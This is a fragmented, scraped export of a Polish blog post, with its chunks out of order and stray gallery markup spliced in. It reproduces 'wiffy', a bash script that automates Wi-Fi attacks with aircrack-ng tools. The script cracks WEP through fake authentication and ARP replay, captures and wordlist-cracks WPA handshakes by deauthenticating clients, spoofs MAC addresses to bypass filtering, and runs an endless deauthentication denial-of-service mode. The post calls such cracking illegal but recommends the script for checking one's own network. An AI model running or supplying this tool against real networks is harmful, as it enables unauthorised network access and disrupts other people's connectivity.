\"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0006.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n 